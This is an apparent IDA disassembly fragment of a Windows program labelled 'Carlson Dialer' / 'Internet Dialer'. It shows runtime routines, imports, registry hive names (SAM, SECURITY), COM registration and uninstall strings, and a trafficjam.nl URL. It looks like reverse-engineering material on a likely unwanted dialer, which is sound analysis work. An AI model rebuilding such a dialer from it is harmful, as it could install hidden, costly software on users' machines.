; [000001AB BYTES: COLLAPSED FUNCTION __ioinit. PRESS KEYPAD "+" TO EXPAND]
; [00000066 BYTES: COLLAPSED FUNCTION ___security_init_cookie. PRESS KEYPAD "+" TO EXPAND]
; [00000147 BYTES: COLLAPSED FUNCTION ___security_error_handler. PRESS KEYPAD "+" TO EXPAND]
align 2
; [000001BA BYTES: COLLAPSED FUNCTION ___crtGetStringTypeA. PRESS KEYPAD "+" TO EXPAND]
; [000000F9 BYTES: COLLAPSED FUNCTION ___crtMessageBoxA. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000007 BYTES: COLLAPSED FUNCTION _strcpy. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [000000E8 BYTES: COLLAPSED FUNCTION _strcat. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000008B BYTES: COLLAPSED FUNCTION _strlen. PRESS KEYPAD "+" TO EXPAND]
; [00000033 BYTES: COLLAPSED FUNCTION _x_ismbbtype. PRESS KEYPAD "+" TO EXPAND]
; [00000011 BYTES: COLLAPSED FUNCTION __ismbblead. PRESS KEYPAD "+" TO EXPAND]
; [0000002F BYTES: COLLAPSED FUNCTION _CPtoLCID. PRESS KEYPAD "+" TO EXPAND]
; [00000029 BYTES: COLLAPSED FUNCTION _setSBCS. PRESS KEYPAD "+" TO EXPAND]
; [0000018C BYTES: COLLAPSED FUNCTION _setSBUpLow. PRESS KEYPAD "+" TO EXPAND]
; [000001E6 BYTES: COLLAPSED FUNCTION __setmbcp. PRESS KEYPAD "+" TO EXPAND]
; [0000001E BYTES: COLLAPSED FUNCTION ___initmbctable. PRESS KEYPAD "+" TO EXPAND]
; [00000043 BYTES: COLLAPSED FUNCTION ___ansicp. PRESS KEYPAD "+" TO EXPAND]
; [000001C9 BYTES: COLLAPSED FUNCTION ___convertcp. PRESS KEYPAD "+" TO EXPAND]
; [0000007B BYTES: COLLAPSED FUNCTION _calloc. PRESS KEYPAD "+" TO EXPAND]
; [000003BC BYTES: COLLAPSED FUNCTION ___crtLCMapStringA. PRESS KEYPAD "+" TO EXPAND]
; [00000058 BYTES: COLLAPSED FUNCTION _atol. PRESS KEYPAD "+" TO EXPAND]
; [00000090 BYTES: COLLAPSED FUNCTION __ismbcspace. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40E7C2 proc near ; CODE XREF: __global_unwind2+13�p
jmp ds:dword_40F10C
sub_40E7C2 endp
; [0000002B BYTES: COLLAPSED FUNCTION __strdup. PRESS KEYPAD "+" TO EXPAND]
; [0000003E BYTES: COLLAPSED FUNCTION _xtoa. PRESS KEYPAD "+" TO EXPAND]
; [00000027 BYTES: COLLAPSED FUNCTION __ltoa. PRESS KEYPAD "+" TO EXPAND]
align 10h
__aulldvrm:
push esi
mov eax, [esp+14h]
or eax, eax
jnz short loc_40E891
mov ecx, [esp+10h]
mov eax, [esp+0Ch]
xor edx, edx
div ecx
mov ebx, eax
mov eax, [esp+8]
div ecx
mov esi, eax
mov eax, ebx
mul dword ptr [esp+10h]
mov ecx, eax
mov eax, esi
mul dword ptr [esp+10h]
add edx, ecx
jmp short loc_40E8D8
; ---------------------------------------------------------------------------
loc_40E891: ; CODE XREF: .text:0040E867�j
mov ecx, eax
mov ebx, [esp+10h]
mov edx, [esp+0Ch]
mov eax, [esp+8]
loc_40E89F: ; CODE XREF: .text:0040E8A9�j
shr ecx, 1
rcr ebx, 1
shr edx, 1
rcr eax, 1
or ecx, ecx
jnz short loc_40E89F
div ebx
mov esi, eax
mul dword ptr [esp+14h]
mov ecx, eax
mov eax, [esp+10h]
mul esi
add edx, ecx
jb short loc_40E8CD
cmp edx, [esp+0Ch]
ja short loc_40E8CD
jb short loc_40E8D6
cmp eax, [esp+8]
jbe short loc_40E8D6
loc_40E8CD: ; CODE XREF: .text:0040E8BD�j
; .text:0040E8C3�j
dec esi
sub eax, [esp+10h]
sbb edx, [esp+14h]
loc_40E8D6: ; CODE XREF: .text:0040E8C5�j
; .text:0040E8CB�j
xor ebx, ebx
loc_40E8D8: ; CODE XREF: .text:0040E88F�j
sub eax, [esp+8]
sbb edx, [esp+0Ch]
neg edx
neg eax
sbb edx, 0
mov ecx, edx
mov edx, ebx
mov ebx, ecx
mov ecx, eax
mov eax, esi
pop esi
retn 10h
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_40E900 proc near ; DATA XREF: .data:00412010�o
mov ecx, offset dword_412048
call sub_401300
test eax, eax
jge short loc_40E915
mov byte_4124E0, 1
loc_40E915: ; CODE XREF: sub_40E900+C�j
push offset loc_40EA00 ; void (__cdecl *)()
call _atexit
pop ecx
retn
sub_40E900 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_40E930 proc near ; DATA XREF: .data:00412014�o
mov ecx, offset dword_412080
mov off_4124D4, offset off_412070
call sub_401300
test eax, eax
jge short loc_40E94F
mov byte_4124E0, 1
loc_40E94F: ; CODE XREF: sub_40E930+16�j
push offset loc_40E9B0 ; void (__cdecl *)()
mov dword_412098, 0
mov off_4124C0, offset off_412070
mov off_412070, offset off_40F590
call _atexit
pop ecx
retn
sub_40E930 endp
; =============== S U B R O U T I N E =======================================
sub_40E979 proc near ; DATA XREF: .data:00412008�o
; FUNCTION CHUNK AT 0040A576 SIZE 00000042 BYTES
; FUNCTION CHUNK AT 0040A5F8 SIZE 0000001D BYTES
; FUNCTION CHUNK AT 0040A62F SIZE 00000016 BYTES
mov ecx, offset dword_412540
call sub_40A5B8
push offset loc_40EA39 ; void (__cdecl *)()
call _atexit
pop ecx
retn
; ---------------------------------------------------------------------------
loc_40E98F: ; DATA XREF: .data:0041200C�o
mov ecx, offset dword_412568
call sub_40A645
push offset loc_40EA43 ; void (__cdecl *)()
call _atexit
pop ecx
retn
; ---------------------------------------------------------------------------
align 10h
; void __cdecl loc_40E9B0()
loc_40E9B0: ; DATA XREF: sub_40E930:loc_40E94F�o
mov eax, dword_412074
test eax, eax
jz short locret_40E9FA
mov eax, dword_41207C
test eax, eax
jz short loc_40E9D6
push offset dword_412074
call sub_401BB0
mov dword_41207C, 0
loc_40E9D6: ; CODE XREF: sub_40E979+47�j
mov eax, dword_412098
test eax, eax
jz short loc_40E9E5
mov ecx, [eax]
push eax
call dword ptr [ecx+8]
loc_40E9E5: ; CODE XREF: sub_40E979+64�j
push offset dword_412080
call ds:dword_40F054 ; RtlDeleteCriticalSection
mov dword_412074, 0
locret_40E9FA: ; CODE XREF: sub_40E979+3E�j
retn
; ---------------------------------------------------------------------------
align 10h
; void __cdecl loc_40EA00()
loc_40EA00: ; DATA XREF: sub_40E900:loc_40E915�o
mov eax, dword_41256C
push esi
push eax
push offset dword_412044
call sub_4020E0
mov eax, dword_412064
xor esi, esi
cmp eax, esi
jz short loc_40EA2B
push eax ; Memory
call _free
add esp, 4
mov dword_412064, esi
loc_40EA2B: ; CODE XREF: sub_40E979+A1�j
mov dword_412068, esi
mov dword_41206C, esi
pop esi
retn
; ---------------------------------------------------------------------------
; void __cdecl loc_40EA39()
loc_40EA39: ; DATA XREF: sub_40E979+A�o
mov ecx, offset dword_412540
jmp loc_40A576
; ---------------------------------------------------------------------------
; void __cdecl loc_40EA43()
loc_40EA43: ; DATA XREF: sub_40E979+20�o
mov ecx, offset dword_412568
jmp loc_40A62F
sub_40E979 endp
_text ends
; Section 2. (virtual address 0000F000)
; Virtual size : 0000264E ( 9806.)
; Section size in file : 0000264E ( 9806.)
; Offset to raw data for section: 0000F000
; Flags 40000040: Data Readable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read
_rdata segment para public 'DATA' use32
assume cs:_rdata
;org 40F000h
dword_40F000 dd 77DD590Bh ; DATA XREF: sub_4030B0+6A�r
; sub_403350+680�r ...
dword_40F004 dd 77DD5C55h ; DATA XREF: sub_404100+278�r
dword_40F008 dd 77DD839Fh ; DATA XREF: sub_401EF0+106�r
; sub_402B60+237�r ...
dword_40F00C dd 77DD22EAh ; DATA XREF: sub_4014F0+22�r
; sub_401EF0+35�r ...
dword_40F010 dd 77DD59F0h ; DATA XREF: sub_401540+13�r
; sub_401560+21�r ...
dword_40F014 dd 77DDAE23h ; DATA XREF: sub_401990+27�r
; sub_402B60+20F�r ...
dword_40F018 dd 77DD842Ah ; DATA XREF: sub_401EF0:loc_401F6A�r
dword_40F01C dd 77DD23D7h ; DATA XREF: .text:00403222�r
; sub_407540+3F�r ...
dword_40F020 dd 77DD189Ah ; DATA XREF: sub_4014D0+C�r
; sub_4014F0+33�r ...
align 8
dword_40F028 dd 77E7A13Fh ; DATA XREF: sub_401140:loc_401185�r
; __setmbcp+42�r
dword_40F02C dd 77E7513Ch ; DATA XREF: sub_401140+19�r
; ___ansicp+20�r
dword_40F030 dd 77E77F21h ; DATA XREF: sub_401140+6�r
dword_40F034 dd 77E7C657h ; DATA XREF: .text:004011C2�r
; sub_40A645+4E�r ...
dword_40F038 dd 77E77CCEh ; DATA XREF: sub_401200+26�r
; sub_401E30+31�r ...
dword_40F03C dd 77E79924h ; DATA XREF: sub_401240+28�r
; sub_404CD0+91�r ...
dword_40F040 dd 77E77EF1h ; DATA XREF: sub_401280+7�r
; sub_402410+2B�r ...
dword_40F044 dd 77E6D706h ; DATA XREF: .text:004012CF�r
; sub_401BB0+12�r ...
dword_40F048 dd 77F7E21Fh ; DATA XREF: .text:00402E89�r
; sub_402EC0+18�r
dword_40F04C dd 77F7E300h ; DATA XREF: .text:00402E99�r
; sub_402EC0+3F�r ...
dword_40F050 dd 77E79908h ; DATA XREF: sub_401300+2C�r
dword_40F054 dd 77F53275h ; DATA XREF: sub_4020E0+6D�r
; sub_402170+87�r ...
dword_40F058 dd 77E7105Fh ; DATA XREF: sub_401380+2F�r
; sub_404CD0+13D�r
dword_40F05C dd 77E7C931h ; DATA XREF: sub_401380+1B�r
dword_40F060 dd 77E760B5h ; DATA XREF: sub_401380+C�r
; sub_404CD0+127�r
dword_40F064 dd 77E6CA8Ah ; DATA XREF: sub_401DD0+29�r
; sub_404CD0+112�r
dword_40F068 dd 77F5157Dh ; DATA XREF: sub_4013E0�r
; sub_407D40+334�r ...
dword_40F06C dd 77E778C5h ; DATA XREF: sub_401D50+8�r
dword_40F070 dd 77E64C09h ; DATA XREF: sub_401C00+48�r
dword_40F074 dd 77E79C90h ; DATA XREF: sub_401C00+41�r
; _doexit+13�r
dword_40F078 dd 77F51597h ; DATA XREF: sub_403030+11�r _free+30�r ...
dword_40F07C dd 77E77CB7h ; DATA XREF: sub_401C00+E�r
; sub_403030+A�r
dword_40F080 dd 77F516F8h ; DATA XREF: sub_401C00+15�r
; __heap_alloc+3E�r ...
dword_40F084 dd 77E74672h ; DATA XREF: sub_401560+9�r
; sub_401590+1�r ...
dword_40F088 dd 77E76A2Eh ; DATA XREF: sub_401650+5D�r
; sub_401950+1�r ...
dword_40F08C dd 77E74A3Bh ; DATA XREF: sub_401D50+1C�r
dword_40F090 dd 77E7AC37h ; DATA XREF: WinMain(x,x,x,x)+114�r
dword_40F094 dd 77E737DEh ; DATA XREF: WinMain(x,x,x,x)+F0�r
dword_40F098 dd 77E777EFh ; DATA XREF: sub_402370+4�r
dword_40F09C dd 77E73BEFh ; DATA XREF: sub_4025B0+67�r
; sub_404100+453�r ...
dword_40F0A0 dd 77E73167h ; DATA XREF: sub_402730+122�r
; sub_402730+1E5�r ...
dword_40F0A4 dd 77E7A099h ; DATA XREF: sub_402730+4E�r
; sub_4050C0+7D�r ...
dword_40F0A8 dd 77E74155h ; DATA XREF: sub_402B60+1B9�r
; sub_4096E0+2D�r ...
dword_40F0AC dd 77E77CC4h ; DATA XREF: .text:00402E7C�r
; sub_402EC0+25�r ...
dword_40F0B0 dd 77E73628h ; DATA XREF: .text:0040331C�r
; sub_40B393+4�r
dword_40F0B4 dd 77E6BD13h ; DATA XREF: sub_403350+414�r
dword_40F0B8 dd 77E76432h ; DATA XREF: sub_403350+3F0�r
; sub_405CE0+28�r ...
dword_40F0BC dd 77E70396h ; DATA XREF: sub_403350+311�r
dword_40F0C0 dd 77E775F1h ; DATA XREF: .text:004011E6�r
; __ValidateEH3RN+131�r ...
dword_40F0C4 dd 77E74995h ; DATA XREF: sub_403D70+2E7�r
dword_40F0C8 dd 77E80618h ; DATA XREF: sub_404CD0+1A3�r
; sub_4099A0+A�r ...
dword_40F0CC dd 77E805B8h ; DATA XREF: sub_404CD0+EE�r
dword_40F0D0 dd 77E79F93h ; DATA XREF: sub_4050C0+152�r
; sub_405440+137�r ...
dword_40F0D4 dd 77E61BE6h ; DATA XREF: WinMain(x,x,x,x)+25D�r
; sub_4097C0+45�r ...
dword_40F0D8 dd 77E7C938h ; DATA XREF: WinMain(x,x,x,x)+7�r
; WinMain(x,x,x,x):loc_405A7D�r ...
dword_40F0DC dd 77E7A5FDh ; DATA XREF: sub_4099A0+26�r
; sub_409FE0+20�r ...
dword_40F0E0 dd 77E805D8h ; DATA XREF: sub_4099A0+15�r
; sub_409FE0+A�r ...
dword_40F0E4 dd 77F522F2h ; DATA XREF: __msize+30�r
dword_40F0E8 dd 77E79E34h ; DATA XREF: ___sbh_free_block+22F�r
dword_40F0EC dd 77E7C726h ; DATA XREF: __heap_init+11�r
dword_40F0F0 dd 77E76E0Bh ; DATA XREF: __heap_init+44�r
dword_40F0F4 dd 77E6177Ah ; DATA XREF: start+160�r __ioinit+57�r
dword_40F0F8 dd 77E6167Bh ; DATA XREF: _clock+A�r ___inittime+A�r ...
dword_40F0FC dd 77E6808Fh ; DATA XREF: sub_40AF44+6�r
dword_40F100 dd 77E616B4h ; DATA XREF: _doexit+1A�r
dword_40F104 dd 77E75CB5h ; DATA XREF: unknown_libname_1+29�r
; sub_40B5F4-7�r
dword_40F108 dd 77F5722Fh ; DATA XREF: _realloc+FD�r
; _realloc+13D�r ...
dword_40F10C dd 77F6183Eh ; DATA XREF: sub_40E7C2�r
dword_40F110 dd 77E7F044h ; DATA XREF: __resetstkoflw+1A�r
; __resetstkoflw+71�r ...
dword_40F114 dd 77E79D8Ch ; DATA XREF: __NMSG_WRITE+155�r
dword_40F118 dd 77E7C3A5h ; DATA XREF: __resetstkoflw+2B�r
dword_40F11C dd 77E7980Ah ; DATA XREF: __resetstkoflw+AF�r
; ___sbh_alloc_new_region+7E�r ...
dword_40F120 dd 77E6169Ah ; DATA XREF: __resetstkoflw+D5�r
dword_40F124 dd 77E79C3Dh ; DATA XREF: __NMSG_WRITE+14E�r
; __ioinit+157�r
dword_40F128 dd 77EB9A84h ; DATA XREF: __XcptFilter+167�r
dword_40F12C dd 77E9C5B1h ; DATA XREF: ___crtGetEnvironmentStringsA+113�r
dword_40F130 dd 77E67702h ; DATA XREF: ___crtGetEnvironmentStringsA:loc_40D47E�r
dword_40F134 dd 77E7C9E1h ; DATA XREF: ___crtGetEnvironmentStringsA+C1�r
dword_40F138 dd 77E77EE1h ; DATA XREF: ___crtGetEnvironmentStringsA+B�r
dword_40F13C dd 77E7C931h ; DATA XREF: __ioinit+19C�r
dword_40F140 dd 77E78406h ; DATA XREF: __ioinit+FE�r
; __ioinit+165�r
dword_40F144 dd 77E802FCh ; DATA XREF: ___security_init_cookie+43�r
dword_40F148 dd 77E7751Ah ; DATA XREF: ___security_init_cookie+37�r
dword_40F14C dd 77E79D5Bh ; DATA XREF: sub_401000+3�r
dword_40F150 dd 77E77963h ; DATA XREF: sub_401000+40�r
dword_40F154 dd 77E80656h ; DATA XREF: ___security_init_cookie+27�r
dword_40F158 dd 77E641EBh ; DATA XREF: ___crtGetStringTypeA+19C�r
dword_40F15C dd 77E7C866h ; DATA XREF: ___crtGetStringTypeA+24�r
; ___crtGetStringTypeA+128�r
dword_40F160 dd 77E6C703h ; DATA XREF: __setmbcp+2B�r
dword_40F164 dd 77E7849Fh ; DATA XREF: _setSBUpLow+1C�r
; __setmbcp+93�r ...
dword_40F168 dd 77E77405h ; DATA XREF: ___crtLCMapStringA+2C3�r
; ___crtLCMapStringA+344�r ...
dword_40F16C dd 77E74CABh ; DATA XREF: sub_403350+2C5�r
dword_40F170 dd 77E781F9h ; DATA XREF: ___crtLCMapStringA+27�r
; ___crtLCMapStringA+15B�r ...
align 8
dword_40F178 dd 77137F69h ; DATA XREF: sub_402A90+9D�r
dword_40F17C dd 77195999h ; DATA XREF: sub_40A570�r
dword_40F180 dd 77122B5Dh ; DATA XREF: sub_406190+11�r
dword_40F184 dd 77123852h ; DATA XREF: sub_406190+1B�r
dword_40F188 dd 77123662h ; DATA XREF: sub_407D40+281�r
; sub_409F60+10�r
dword_40F18C dd 771216A4h ; DATA XREF: sub_401DD0+4A�r
; sub_401E30+3E�r
dword_40F190 dd 77121680h ; DATA XREF: sub_402730+270�r
dword_40F194 dd 771214E8h ; DATA XREF: sub_401D10+1D�r
; sub_401D80+31�r ...
dword_40F198 dd 77131002h ; DATA XREF: sub_403D70+256�r
dword_40F19C dd 7713D759h ; DATA XREF: sub_4029F0+63�r
dword_40F1A0 dd 77137DF4h ; DATA XREF: sub_402730+18B�r
; sub_402730+263�r
align 8
dword_40F1A8 dd 773F97B0h ; DATA XREF: sub_403350+744�r
dword_40F1AC dd 77428B97h ; DATA XREF: sub_405BC0+12�r
; sub_405FB0+6D�r ...
dd 0
dword_40F1B4 dd 7730FE11h ; DATA XREF: sub_402730+A5�r
dd 0
dword_40F1BC dd 77D444FFh ; DATA XREF: sub_408350+38�r
; sub_408350+4C4�r
dword_40F1C0 dd 77D444F0h ; DATA XREF: sub_406110+70�r
; sub_408350+338�r ...
dword_40F1C4 dd 77D626EDh ; DATA XREF: sub_405CE0+36�r
; sub_405F00+8�r ...
dword_40F1C8 dd 77D6272Dh ; DATA XREF: sub_405E80+17�r
; sub_406060+73�r
dword_40F1CC dd 77D48AA8h ; DATA XREF: sub_407D40+534�r
dword_40F1D0 dd 77D6ADD7h ; DATA XREF: sub_406210+7F�r
dword_40F1D4 dd 77D442CFh ; DATA XREF: sub_407D40+5D1�r
dword_40F1D8 dd 77D4B816h ; DATA XREF: sub_405CC0+C�r
; sub_405EB0+3B�r ...
dword_40F1DC dd 77D4C783h ; DATA XREF: sub_405D70+A5�r
; sub_405E40+18�r ...
dword_40F1E0 dd 77D4C96Ah ; DATA XREF: sub_405D70+3D�r
; sub_405D70+7B�r ...
dword_40F1E4 dd 77D47250h ; DATA XREF: sub_405D70+21�r
; sub_408A10+20�r ...
dword_40F1E8 dd 77D47627h ; DATA XREF: sub_407D40+55�r
dword_40F1EC dd 77D4D42Bh ; DATA XREF: sub_407D40+58A�r
dword_40F1F0 dd 77D4816Dh ; DATA XREF: sub_407D40+542�r
dword_40F1F4 dd 77D6274Fh ; DATA XREF: sub_407AA0+16�r
dword_40F1F8 dd 77D5BB6Ch ; DATA XREF: sub_407D40+2A8�r
dword_40F1FC dd 77D4702Fh ; DATA XREF: sub_407D40+59C�r
dword_40F200 dd 77D49A11h ; DATA XREF: sub_405CC0+4�r
; sub_405EB0+33�r ...
dword_40F204 dd 77D43FEDh ; DATA XREF: .text:00405C71�r
; sub_407D40+3A�r
dword_40F208 dd 77D47F34h ; DATA XREF: .text:00405C96�r
dword_40F20C dd 77D48137h ; DATA XREF: .text:00405C9D�r
; sub_407D40+576�r
dword_40F210 dd 77D47E92h ; DATA XREF: WinMain(x,x,x,x)+17C�r
dword_40F214 dd 77D44200h ; DATA XREF: WinMain(x,x,x,x)+1E2�r
dword_40F218 dd 77D5F482h ; DATA XREF: WinMain(x,x,x,x)+1F9�r
dword_40F21C dd 77D441F2h ; DATA XREF: WinMain(x,x,x,x)+1FF�r
dword_40F220 dd 77D5E69Dh ; DATA XREF: WinMain(x,x,x,x)+1A8�r
dword_40F224 dd 77D4CD1Eh ; DATA XREF: sub_4020E0+2C�r
dword_40F228 dd 77D47D27h ; DATA XREF: WinMain(x,x,x,x):loc_405B0C�r
; .text:00405C8F�r ...
dword_40F22C dd 77D49951h ; DATA XREF: sub_404A20+B3�r
; .text:00404B7D�r ...
dword_40F230 dd 77D472ECh ; DATA XREF: sub_401060+8�r
; sub_401770+19�r ...
dword_40F234 dd 77D5C5EAh ; DATA XREF: sub_401000+4E�r
dword_40F238 dd 77D6EF20h ; DATA XREF: .text:00405C62�r
; sub_407D40+29�r
align 10h
dword_40F240 dd 76204E4Dh ; DATA XREF: sub_4066F0+867�r
; sub_4066F0+872�r ...
dword_40F244 dd 76214750h ; DATA XREF: sub_4066F0+7A�r
; sub_406FE0+C7�r
dword_40F248 dd 7620AFB6h ; DATA XREF: sub_4066F0+58�r
; sub_406FE0+55�r
dword_40F24C dd 7623BA67h ; DATA XREF: sub_4066F0+32�r
; sub_406FE0+33�r
dword_40F250 dd 762400A5h ; DATA XREF: sub_4066F0+7�r
; sub_406FE0+8�r
dword_40F254 dd 7620BD61h ; DATA XREF: sub_4066F0+A4�r
; sub_406FE0+F3�r
dd 0
dword_40F25C dd 771C07CBh ; DATA XREF: sub_4025B0+41�r
dword_40F260 dd 771C07B9h ; DATA XREF: sub_4025B0+BE�r
; sub_4025B0+D3�r ...
dword_40F264 dd 771E664Ch ; DATA XREF: sub_401B60+20�r
; sub_4022A0+10�r
dword_40F268 dd 771F5279h ; DATA XREF: sub_4015D0+2C�r
dword_40F26C dd 771C1E56h ; DATA XREF: sub_402390+2E�r
; sub_402B60+64�r ...
dword_40F270 dd 771C0CE0h ; DATA XREF: sub_402B60+13A�r
dword_40F274 dd 771C16BAh ; DATA XREF: WinMain(x,x,x,x)+26D�r
dword_40F278 dd 771C6F69h ; DATA XREF: WinMain(x,x,x,x)+11�r
dword_40F27C dd 771E4985h ; DATA XREF: sub_401420+47�r
; sub_402210+12�r
dd 2 dup(0)
off_40F288 dd offset aAppid ; DATA XREF: sub_401950+D�o
; "AppID"
dd offset aClsid_0 ; "CLSID"
dd offset aComponentCateg ; "Component Categories"
dd offset aFiletype ; "FileType"
dd offset aInterface ; "Interface"
dd offset aHardware ; "Hardware"
dd offset aMime ; "Mime"
dd offset aSam ; "SAM"
dd offset aSecurity ; "SECURITY"
dd offset aSystem ; "SYSTEM"
dd offset aSoftware ; "Software"
dd offset aTypelib ; "TypeLib"
aTypelib db 'TypeLib',0 ; DATA XREF: sub_401950+1F�o
; .rdata:0040F2B4�o
aSoftware db 'Software',0 ; DATA XREF: .rdata:0040F2B0�o
align 4
aSystem db 'SYSTEM',0 ; DATA XREF: .rdata:0040F2AC�o
align 4
aSecurity db 'SECURITY',0 ; DATA XREF: .rdata:0040F2A8�o
align 10h
aSam db 'SAM',0 ; DATA XREF: .rdata:0040F2A4�o
aMime db 'Mime',0 ; DATA XREF: .rdata:0040F2A0�o
align 4
aHardware db 'Hardware',0 ; DATA XREF: .rdata:0040F29C�o
align 4
aInterface db 'Interface',0 ; DATA XREF: .rdata:0040F298�o
align 4
aFiletype db 'FileType',0 ; DATA XREF: .rdata:0040F294�o
align 10h
aComponentCateg db 'Component Categories',0 ; DATA XREF: .rdata:0040F290�o
align 4
aClsid_0 db 'CLSID',0 ; DATA XREF: .rdata:0040F28C�o
align 10h
aAppid db 'AppID',0 ; DATA XREF: .rdata:off_40F288�o
align 4
dword_40F338 dd 9B4AA441h, 11D59EBFh, 5000118Ch, 0F55749DAh, 40F398h
; DATA XREF: WinMain(x,x,x,x)+1B�o
dd 40F394h, 40F390h, 40F38Ch, 40F388h, 40F37Ch, 40F370h
dd 40F368h
aDelete db 'Delete',0 ; DATA XREF: sub_404100+56�o
; .rdata:0040FC38�o
align 10h
aNoremove db 'NoRemove',0 ; DATA XREF: sub_404100:loc_40426D�o
; .rdata:0040FC34�o
align 4
aForceremove db 'ForceRemove',0 ; DATA XREF: sub_404100+6A�o
; .rdata:0040FC30�o
aVal db 'Val',0 ; DATA XREF: sub_404100:loc_404295�o
; .rdata:0040FC2C�o
aB: ; DATA XREF: sub_401650+49�o
; .rdata:0040FC28�o
unicode 0, <B>,0
aD: ; DATA XREF: sub_401650+36�o
; .rdata:0040FC24�o
unicode 0, <D>,0
aM: ; DATA XREF: sub_401650+23�o
; .rdata:0040FC20�o
unicode 0, <M>,0
aS_0: ; DATA XREF: sub_401650+10�o
; .rdata:0040FC1C�o
unicode 0, <S>,0
dword_40F39C dd 323h, 0 ; DATA XREF: sub_402390+29�o
dd 0C0h, 46000000h, 0
dword_40F3B0 dd 0FFFFFFFFh, 4010F9h, 40110Dh, 0 ; DATA XREF: sub_4010B0+5�o
dword_40F3C0 dd 0FFFFFFFFh, 401334h, 401344h ; DATA XREF: sub_401300+5�o
dword_40F3CC dd 2 dup(0) ; DATA XREF: sub_401420+23�o
; sub_402210+2F�o
dd 0C0h, 46000000h, 59454B48h, 5255435Fh, 544E4552h, 4E4F435Fh
dd 474946h, 59454B48h, 4E59445Fh, 5441445Fh, 41h, 59454B48h
dd 5245505Fh, 4D524F46h, 45434E41h, 5441445Fh, 41h, 59454B48h
dd 4553555Fh, 5352h, 59454B48h, 434F4C5Fh, 4D5F4C41h, 49484341h
dd 454Eh, 59454B48h, 5255435Fh, 544E4552h, 4553555Fh, 52h
dd 59454B48h, 414C435Fh, 53455353h, 4F4F525Fh, 54h, 43434B48h
dd 0
aHkdd db 'HKDD',0
align 10h
aHkpd db 'HKPD',0
align 4
aHku db 'HKU',0
aHklm db 'HKLM',0
align 4
aHkcu db 'HKCU',0 ; DATA XREF: .rdata:0040F4A0�o
align 4
aHkcr db 'HKCR',0 ; DATA XREF: .rdata:off_40F498�o
align 8
off_40F498 dd offset aHkcr ; DATA XREF: sub_404BA0:loc_404C00�r
; "HKCR"
dword_40F49C dd 80000000h ; DATA XREF: sub_404BA0:loc_404C24�r
dd offset aHkcu ; "HKCU"
dd 80000001h, 40F47Ch, 80000002h, 40F478h, 80000003h, 40F470h
dd 80000004h, 40F468h, 80000006h, 40F460h, 80000005h, 40F44Ch
dd 80000000h, 40F438h, 80000001h, 40F424h, 80000002h, 40F418h
dd 80000003h, 40F400h, 80000004h, 40F3F0h, 80000006h, 40F3DCh
dd 80000005h
dword_40F508 dd 146h, 0 ; DATA XREF: sub_402390+21�o
dd 0C0h, 46000000h
aAppid_0: ; DATA XREF: sub_4023F0+B�o
unicode 0, <APPID>,0
dword_40F524 dd 0 ; DATA XREF: sub_4023F0+6�o
off_40F528 dd offset sub_402520 ; DATA XREF: sub_4024D0+4�o
; sub_4050C0+13�o ...
dd offset sub_402530
dd offset sub_402540
dd offset sub_403CA0
dd offset sub_4020D0
dd offset sub_402550
dword_40F540 dd 626C742Eh ; DATA XREF: sub_402730+19B�r
byte_40F544 db 0 ; DATA XREF: sub_402730+1A0�r
align 4
aImplementedCat db '\Implemented Categories',0 ; DATA XREF: sub_402B60+24F�o
aRequiredCatego db '\Required Categories',0 ; DATA XREF: sub_402B60+1C6�o
align 4
aClsid db 'CLSID\',0 ; DATA XREF: sub_402B60+1AE�o
; sub_402B60:loc_402D9D�o
align 10h
dword_40F580 dd 2E012h, 0 ; DATA XREF: sub_402B60+56�o
dd 0C0h, 46000000h
off_40F590 dd offset sub_403050 ; DATA XREF: sub_40E930+38�o
; .data:off_412070�o
dd offset sub_402370
dd offset sub_401D50
dd offset sub_402380
dd offset sub_402390
dd offset sub_4023F0
dd offset sub_4023E0
dd offset sub_4023E0
dd offset sub_405920
dd offset sub_405430
aUninstshortcut db 'uninstShortcut',0 ; DATA XREF: sub_4030B0+B7�o
; .text:0040329A�o ...
align 4
aUninstexe db 'uninstExe',0 ; DATA XREF: sub_4030B0+98�o
; .text:00403234�o ...
align 4
asc_40F5D4: ; DATA XREF: sub_4030B0+2E�o
; .text:004031DC�o ...
unicode 0, <\>,0
aSoftwareMicros db 'SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Carlson',0
; DATA XREF: .text:00403339�o
; sub_403350+672�o
aUninstallstrin db 'UninstallString',0 ; DATA XREF: sub_403350+722�o
aU db ' -u',0 ; DATA XREF: sub_403350+6BA�o
aDisplayname db 'DisplayName',0 ; DATA XREF: sub_403350+6B2�o
aCarlsonDialer db 'Carlson Dialer',0 ; DATA XREF: sub_403350+68E�o
; sub_403350+6AA�o
align 4
aInternetDialer db 'Internet Dialer',0 ; DATA XREF: sub_403350+5A0�o
a_lnk db '.lnk',0 ; DATA XREF: sub_403350:loc_4038A9�o
align 4
a_exe db '.exe',0 ; DATA XREF: sub_403350:loc_4036E0�o
align 4
a_: ; DATA XREF: sub_403350+26B�o
unicode 0, <.>,0
aC db 'c:\',0 ; DATA XREF: sub_403350:loc_4034FA�o
off_40F66C dd offset sub_404890 ; DATA XREF: sub_404850+15�o
; sub_404B20+6�o
dd offset sub_404B20
dd offset sub_404A10
dd offset nullsub_1
aRegistry: ; DATA XREF: sub_4050C0+20B�o
; sub_405440+24E�o
unicode 0, <REGISTRY>,0
align 10h
aModule_raw: ; DATA XREF: sub_4050C0+1D1�o
; sub_405440+1BA�o
unicode 0, <Module_Raw>,0
align 4
aModule: ; DATA XREF: sub_4050C0+163�o
; sub_4050C0+1B6�o ...
unicode 0, <Module>,0
align 4
aRegserver db 'RegServer',0 ; DATA XREF: WinMain(x,x,x,x)+7C�o
align 4
aUnregserver db 'UnregServer',0 ; DATA XREF: WinMain(x,x,x,x):loc_4059A0�o
word_40F6D0 dw 2F2Dh ; DATA XREF: WinMain(x,x,x,x)+41�r
byte_40F6D2 db 0 ; DATA XREF: WinMain(x,x,x,x)+36�r
align 4
aHttpWww_traffi db 'http://www.trafficjam.nl/?failed=initialize',0
; DATA XREF: .data:off_4120D8�o
aCarlson db 'Carlson',0 ; DATA XREF: .data:off_4120D4�o
aProgramfilesdi db 'ProgramFilesDir',0 ; DATA XREF: .data:off_4120D0�o
